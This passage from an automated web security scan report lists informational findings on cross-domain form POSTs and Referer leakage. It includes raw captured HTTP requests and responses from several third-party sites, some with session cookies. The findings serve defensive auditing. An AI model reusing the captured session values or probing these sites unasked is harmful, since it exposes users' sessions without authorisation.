Env={module:"like_widget",impid:"14dbb29f",user:0,locale:"en_US",method:"GET",start:(new Date()).getTime(),ps_limit:5,ps_ratio:4,svn_rev:374976,vip:"66.220.149.11",static_base:"http:\/\/static.ak.fbcdn.net\/",www_base:"http:\/\/www.facebook.com\/",rep_lag:2,fb_dtsg:"-rYxz",lhsh:"267a9",tracking_domain:"http:\/\/pixel.facebook.com",retry_ajax_on_network_error:"1",ajaxpipe_enabled:"1",no_cookies:1};
</script>

<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y0/r/7NS4A3NTFw2.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
<script type="text/javascript">window.Bootloader && Bootloader.done(["lIKWr"]);</script></head><body class="plugin transparent_widget safari4 Locale_en_US"><div id="FB_HiddenContainer" style="position:absolute; top:-10000px; width:0px; height:0px;"></div><div id="LikePluginPagelet"><div id="connect_widget_4dc47740b5e958045820955" class="connect_widget button_count" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider"><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center connect_widget_confirm_cell"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_button_count_including hidden_elem"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="thumbs_up hidden_elem"></div></td><td><div class="undo hidden_elem"></div></td></tr><tr><td><div class="connect_widget_button_count_nub"><s></s><i></i></div></td><td><div class="connect_widget_button_count_count">986K</div></td></tr></tbody></table></td><td class="connect_widget_button_count_excluding"><table class="uiGrid" cellspa
...[SNIP]...

Request 2

GET /plugins/like.php?href=www.facebook.com%2Fexpedia&layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&height=21&ref=header HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.66.55
X-Cnection: close
Date: Fri, 06 May 2011 22:33:46 GMT
Content-Length: 6729

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<script type="text/javascript">
Env={module:"like_widget",impid:"6b42206f",user:0,locale:"en_US",method:"GET",start:(new Date()).getTime(),ps_limit:5,ps_ratio:4,svn_rev:374976,vip:"66.220.149.11",static_base:"http:\/\/static.ak.fbcdn.net\/",www_base:"http:\/\/www.facebook.com\/",rep_lag:2,fb_dtsg:"-rYxz",lhsh:"267a9",tracking_domain:"http:\/\/pixel.facebook.com",retry_ajax_on_network_error:"1",ajaxpipe_enabled:"1",no_cookies:1};
</script>

<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y0/r/7NS4A3NTFw2.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
<script type="text/javascript">window.Bootloader && Bootloader.done(["lIKWr"]);</script></head><body class="plugin transparent_widget safari4 Locale_en_US"><div id="FB_HiddenContainer" style="position:absolute; top:-10000px; width:0px; height:0px;"></div><div id="LikePluginPagelet"><div id="connect_widget_4dc4774acaf861057200676" class="connect_widget button_count" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider"><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center connect_widget_confirm_cell"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_button_count_including hidden_elem"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="thumbs_up hidden_elem"></div></td><td><div class="undo hidden_elem"></div></td></tr><tr><td><div class="connect_widget_button_count_nub"><s></s><i></i></div></td><td><div class="connect_widget_button_count_count">986K</div></td></tr></tbody></table></td><td class="connect_widget_button_count_excluding"><table class="uiGrid" cellspa
...[SNIP]...
23. Cross-domain POST  previous  next
There are 8 instances of this issue:

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.

23.1. https://events.gsmiweb.com/subscribe.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://events.gsmiweb.com
Path:   /subscribe.php

Issue detail

The page contains a form which POSTs data to the domain www.salesforce.com. The form contains the following fields:

Request

GET /subscribe.php?event_id=82 HTTP/1.1
Host: events.gsmiweb.com
Connection: keep-alive
Referer: https://events.gsmiweb.com/events.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=246713051.1303999551.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246713051.480784472.1303999551.1303999551.1303999551.1; PHPSESSID=n1ninf9mvtgucavvk20tlpt8n1

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 21:39:00 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 40247


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link rel="stylesheet" href="css/default.advanced.css" type="te
...[SNIP]...
<link href="https://events.gsmiweb.com/css/SpryValidationTextField.css" rel="stylesheet" type="text/css" />

<form action="https://www.salesforce.com/servlet/servlet.WebToLead?encoding=UTF-8" method="POST">
<input type="hidden" name="oid" value="00D70000000JYRm">
...[SNIP]...
23.2. http://hmficweb.hinghammutual.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hmficweb.hinghammutual.com
Path:   /

Issue detail

The page contains a form which POSTs data to the domain localhost. The form contains the following fields:

Request

GET / HTTP/1.1
Referer: http://hmficweb.hinghammutual.com/billing_view/billingview.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hmficweb.hinghammutual.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 17:35:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=okh4joycosvncyichzumbi3a; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 17204

<xml id='AgencyCityXML'><Locations><Location STATE="CT" CITY="Avon" /><Location STATE="CT" CITY="Berlin" /><Location STATE="CT" CITY="Bethel" /><Location STATE="CT" CITY="Bolton" /><Location STATE="CT
...[SNIP]...
<body class="home" onload="funLoadAgencyLocator();">
       <form name="Form1" method="post" action="https://localhost/hingham.default.aspx" id="Form1">
<div>
...[SNIP]...
23.3. http://hmficweb.hinghammutual.com/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hmficweb.hinghammutual.com
Path:   /default.aspx

Issue detail

The page contains a form which POSTs data to the domain localhost. The form contains the following fields:

Request

GET /default.aspx HTTP/1.1
Referer: http://hmficweb.hinghammutual.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hmficweb.hinghammutual.com
Cookie: ASPSESSIONIDSQCDDDAA=HPHJKIBCNPBPFKFPCLEPAMCN; ASP.NET_SessionId=kvicvmmhrzmxk4i3unxfj445
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 17:36:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 17204

<xml id='AgencyCityXML'><Locations><Location STATE="CT" CITY="Avon" /><Location STATE="CT" CITY="Berlin" /><Location STATE="CT" CITY="Bethel" /><Location STATE="CT" CITY="Bolton" /><Location STATE="CT
...[SNIP]...
<body class="home" onload="funLoadAgencyLocator();">
       <form name="Form1" method="post" action="https://localhost/hingham.default.aspx" id="Form1">
<div>
...[SNIP]...
23.4. http://www.resiteonline.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resiteonline.com
Path:   /

Issue detail

The page contains a form which POSTs data to the domain app.resiteit.com. The form contains the following fields:

Request

GET / HTTP/1.1
Host: www.resiteonline.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 18:52:13 GMT
Server:
Content-Length: 8284
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <m
...[SNIP]...
</form>
       <form action="http://app.resiteit.com/control/" method="post" enctype="application/x-www-form-urlencoded">
       <div id="forgot">
...[SNIP]...
23.5. http://www.resiteonline.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resiteonline.com
Path:   /

Issue detail

The page contains a form which POSTs data to the domain app.resiteit.com. The form contains the following fields:

Request

GET / HTTP/1.1
Host: www.resiteonline.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 18:52:13 GMT
Server:
Content-Length: 8284
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <m
...[SNIP]...
</h3>
       <form action="http://app.resiteit.com/control/" method="post" enctype="application/x-www-form-urlencoded">
       <div id="loginbox">
...[SNIP]...
23.6. http://www.sapha.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sapha.com
Path:   /

Issue detail

The page contains a form which POSTs data to the domain tours.hooksell.com. The form contains the following fields:

Request

GET / HTTP/1.1
Host: www.sapha.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sapha_tst_2546=TRUE; sapha_2546_1=62715%7C35764%7C31540%7C2011-04-22+15%3A37%3A56; __utmz=1.1303524001.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sapha_tst_1=TRUE; __utma=1.850239084.1303524001.1303524001.1303524001.1; sapha_1_19=108127%7C2674799%7C2668748%7C2011-04-22+20%3A01%3A46

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:05:37 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 14567

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
       "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta htt
...[SNIP]...
</div>-->
<form action="http://tours.hooksell.com/SubmitRegistration.aspx?TourID=3018" method="post">
<p>
...[SNIP]...
23.7. http://www.secureworks.com/compliance/comp/pci.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.secureworks.com
Path:   /compliance/comp/pci.html

Issue detail

The page contains a form which POSTs data to the domain now.eloqua.com. The form contains the following fields:

Request

GET /compliance/comp/pci.html?_kk=6713825b-9989-43cb-8a7b-5c5635138b40&_kt=6426467207&gclid=CMm21t3V1KgCFcPd4AodU3_CiA HTTP/1.1
Host: www.secureworks.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 00:23:03 GMT
Server: Apache
Vary: Accept-Encoding
Cache-Control: public, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 69185


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
   <head>        
<!-- Set content headers-->
<meta http-equiv="ExpiresDefault
...[SNIP]...
<!-- form block -->    


<form name="full_info_form" method="post" action="http://now.eloqua.com/e/f2.aspx" onSubmit="return check_form(this);">
<input type='hidden' name="oid" id="" value="00D3000000002tn">
...[SNIP]...
23.8. http://www.secureworks.com/compliance/comp/pci.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.secureworks.com
Path:   /compliance/comp/pci.html

Issue detail

The page contains a form which POSTs data to the domain now.eloqua.com. The form contains the following fields:

Request

GET /compliance/comp/pci.html?_kk=6713825b-9989-43cb-8a7b-5c5635138b40&_kt=6426467207&gclid=CMm21t3V1KgCFcPd4AodU3_CiA HTTP/1.1
Host: www.secureworks.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 00:23:03 GMT
Server: Apache
Vary: Accept-Encoding
Cache-Control: public, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 69185


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
   <head>        
<!-- Set content headers-->
<meta http-equiv="ExpiresDefault
...[SNIP]...
</iframe-->

<form name="newsletter" method="post" action="http://now.eloqua.com/e/f2.aspx" onSubmit="return check_form(this);">
<input type="hidden" name="elqFormName" value="newsletter_form" />
...[SNIP]...
24. Cross-domain Referer leakage  previous  next
There are 88 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.

24.1. http://ad.doubleclick.net/adj/scmag.hmktus/sc  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/scmag.hmktus/sc

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/scmag.hmktus/sc;log=0;spr=0;sid=0;cc=us;pos=1501;tile=1;dcopt=ist;sz=640x480;ord=742215506033972000? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Fri, 06 May 2011 21:50:01 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 247

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aff/0/0/%2a/t;44306;0-0;0;37430148;1412-640/480;0/0/0;;~sscs=%3f"><img src="http://s0.2mdn.net/viewad/817-grey.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...
24.2. http://ad.doubleclick.net/adj/scmag.hmktus/sc  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/scmag.hmktus/sc

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/scmag.hmktus/sc;log=0;spr=0;sid=0;cc=us;pos=101;tile=2;sz=728x90,468x60;ord=742215506033972000? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Fri, 06 May 2011 21:50:01 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 368

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aff/0/0/%2a/y;235344224;0-0;0;37430148;3454-728/90;40373933/40391720/1;;~sscs=%3fhttp://www.worldcampus.psu.edu/MasterHomelandSecurity_InfoSecurityForensics.shtml?CID=HAY33307"><img src="http://s0.2mdn.net/viewad/3057949/PSU_728x90.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...
24.3. http://ad.doubleclick.net/adj/scmag.hmktus/sc.other  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/scmag.hmktus/sc.other

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/scmag.hmktus/sc.other;log=0;spr=0;sid=122;cc=us;pos=303;tile=10;sz=336x280,300x250,300x600;ord=28877081349492070? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/subscribe/section/122/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Fri, 06 May 2011 21:50:28 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 314

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aff/0/0/%2a/i;240531546;0-0;1;37579671;4986-300/600;41519850/41537637/1;;~sscs=%3fhttps://www.isc2.org/offer"><img src="http://s0.2mdn.net/viewad/2305144/ISC2_300x600doubleagent.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...
24.4. http://ad.doubleclick.net/adj/scmag.hmktus/sc.other  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/scmag.hmktus/sc.other

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/scmag.hmktus/sc.other;log=0;spr=0;sid=122;cc=us;pos=101;tile=2;sz=728x90,468x60;ord=544787951046600960? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/subscribe/section/122/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 07 May 2011 01:30:36 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 473

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b00/0/0/%2a/l;240894003;0-0;1;37579671;3454-728/90;42038757/42056544/1;;~sscs=%3fhttp://www.entrust.com/strong-authentication/enterprise-security/index.htm?utm_source=SC%2BMagazine&utm_medium=Leader%2Bbanner&utm_content=IDG%2BEnterprise&utm_campaign=SC%2BMag%2BLeader%2BIDG%2BEnt"><img src="http://s0.2mdn.net/viewad/2519773/2-sc_728x90.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...
24.5. http://ad.doubleclick.net/adj/scmag.hmktus/sc.other  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/scmag.hmktus/sc.other

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/scmag.hmktus/sc.other;log=0;spr=0;sid=122;cc=us;pos=1501;tile=1;dcopt=ist;sz=640x480;ord=28877081349492070? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/subscribe/section/122/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Fri, 06 May 2011 21:50:08 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 247

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aff/0/0/%2a/y;44306;0-0;0;37579671;1412-640/480;0/0/0;;~sscs=%3f"><img src="http://s0.2mdn.net/viewad/817-grey.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...
24.6. http://ad.doubleclick.net/adj/scmag.hmktus/sc.other  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/scmag.hmktus/sc.other

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/scmag.hmktus/sc.other;log=0;spr=0;sid=122;cc=us;pos=301;tile=8;sz=336x280,300x250,300x100;ord=28877081349492070? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/subscribe/section/122/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Fri, 06 May 2011 21:50:23 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 443

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aff/0/0/%2a/d;240485532;0-0;1;37579671;4307-300/250;41792364/41810151/1;;~sscs=%3fhttp://www.entrust.net/discovery/index.htm?utm_source=SC%2BMagazine&utm_medium=IMU%2Bbanner%2BB&utm_content=Discovery&utm_campaign=SC%2BMag%2BDisc%2BIMU%2BB"><img src="http://s0.2mdn.net/viewad/2519773/Entrust-Q1BA-300x250-B.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...
24.7. http://ad.doubleclick.net/adj/scmag.hmktus/sc.other  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/scmag.hmktus/sc.other

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

